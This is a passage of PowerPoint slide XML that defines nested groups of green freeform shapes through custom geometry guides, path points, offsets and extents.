                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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7" name="Freeform 662"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3846"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 447 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 447 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="482">
                        <a:moveTo>
                          <a:pt x="447" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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71" name="Group 663"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4006" y="3885"/>
                  <a:ext cx="285" cy="92"/>
                  <a:chOff x="4006" y="3885"/>
                  <a:chExt cx="285" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="472" name="Freeform 664"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4077" y="3904"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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3" name="Freeform 665"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3942"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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48" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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4" name="Freeform 666"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3885"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="482">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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24" name="Group 667"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2063" y="2700"/>
                <a:ext cx="714" cy="207"/>
                <a:chOff x="3577" y="3770"/>
                <a:chExt cx="714" cy="207"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="452" name="Group 668"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3720" y="3808"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3720" y="3808"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="465" name="Freeform 669"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3792" y="3828"/>
                    <a:ext cx="214" cy="72"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 456"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 96 h 456"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 456 h 456"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 456"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="456">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="456"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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6" name="Freeform 670"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3866"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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7" name="Freeform 671"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3808"/>
                    <a:ext cx="286" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 449 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 359 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 449 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="480">
                        <a:moveTo>
                          <a:pt x="449" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="359"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="449" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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53" name="Group 672"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3577" y="3770"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3577" y="3770"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="462" name="Freeform 673"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3649" y="3789"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 458"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 458"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 458 h 458"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 458"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="458">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="458"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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3" name="Freeform 674"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3828"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 217 h 217"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 118 h 217"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 217"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 96 h 217"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 217 h 2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48" h="217">
                        <a:moveTo>
                          <a:pt x="0" y="217"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="118"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="217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4" name="Freeform 675"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3577" y="3770"/>
                    <a:ext cx="286" cy="76"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 480"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 362 h 480"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 480 h 480"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 121 h 480"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="480">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="362"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="480"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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54" name="Group 676"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3863" y="3846"/>
                  <a:ext cx="285" cy="93"/>
                  <a:chOff x="3863" y="3846"/>
                  <a:chExt cx="285" cy="93"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="459" name="Freeform 677"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3934" y="3866"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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678"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3904"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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679"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3863" y="3846"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 447 w 1791"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1791 w 1791"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1791"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1791"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 447 w 1791"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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791" h="482">
                        <a:moveTo>
                          <a:pt x="447" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1791" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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55" name="Group 680"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4006" y="3885"/>
                  <a:ext cx="285" cy="92"/>
                  <a:chOff x="4006" y="3885"/>
                  <a:chExt cx="285" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="456" name="Freeform 681"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4077" y="3904"/>
                    <a:ext cx="214" cy="73"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 459"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 97 h 459"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 459 h 459"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 362 h 459"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="459">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="459"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="36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7" name="Freeform 682"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3942"/>
                    <a:ext cx="71" cy="35"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 448"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 448"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 448 w 448"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 448 w 448"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 448"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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48" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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8" name="Freeform 683"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="4006" y="3885"/>
                    <a:ext cx="285" cy="77"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 448 w 1792"/>
                      <a:gd name="T1" fmla="*/ 0 h 482"/>
                      <a:gd name="T2" fmla="*/ 1792 w 1792"/>
                      <a:gd name="T3" fmla="*/ 361 h 482"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1792"/>
                      <a:gd name="T5" fmla="*/ 482 h 482"/>
                      <a:gd name="T6" fmla="*/ 0 w 1792"/>
                      <a:gd name="T7" fmla="*/ 120 h 482"/>
                      <a:gd name="T8" fmla="*/ 448 w 1792"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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792" h="482">
                        <a:moveTo>
                          <a:pt x="448" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="1792" y="361"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="482"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="120"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="448" y="0"/>
                        </a:lnTo>
                        <a:close/>
                      </a:path>
                    </a:pathLst>
                  </a:custGeom>
                  <a:solidFill>
                    <a:srgbClr val="009900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25" name="Group 684"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="1493" y="2545"/>
                <a:ext cx="714" cy="207"/>
                <a:chOff x="3577" y="3770"/>
                <a:chExt cx="714" cy="207"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="436" name="Group 685"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3720" y="3808"/>
                  <a:ext cx="286" cy="92"/>
                  <a:chOff x="3720" y="3808"/>
                  <a:chExt cx="286" cy="92"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="449" name="Freeform 686"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3792" y="3828"/>
                    <a:ext cx="214" cy="72"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1344"/>
                      <a:gd name="T1" fmla="*/ 0 h 456"/>
                      <a:gd name="T2" fmla="*/ 0 w 1344"/>
                      <a:gd name="T3" fmla="*/ 96 h 456"/>
                      <a:gd name="T4" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T5" fmla="*/ 456 h 456"/>
                      <a:gd name="T6" fmla="*/ 1344 w 1344"/>
                      <a:gd name="T7" fmla="*/ 359 h 456"/>
                      <a:gd name="T8" fmla="*/ 0 w 1344"/>
                      <a:gd name="T9" fmla="*/ 0 h 4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44" h="456">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="96"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="456"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1344" y="35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0" name="Freeform 687"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3866"/>
                    <a:ext cx="72" cy="34"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 447"/>
                      <a:gd name="T1" fmla="*/ 218 h 218"/>
                      <a:gd name="T2" fmla="*/ 0 w 447"/>
                      <a:gd name="T3" fmla="*/ 121 h 218"/>
                      <a:gd name="T4" fmla="*/ 447 w 447"/>
                      <a:gd name="T5" fmla="*/ 0 h 218"/>
                      <a:gd name="T6" fmla="*/ 447 w 447"/>
                      <a:gd name="T7" fmla="*/ 97 h 218"/>
                      <a:gd name="T8" fmla="*/ 0 w 447"/>
                      <a:gd name="T9" fmla="*/ 218 h 2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47" h="218">
                        <a:moveTo>
                          <a:pt x="0" y="218"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="121"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="447" y="97"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="218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1" name="Freeform 688"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm flipH="1">
                    <a:off x="3720" y="3808"/>
                    <a:ext cx="286" cy="77"/>
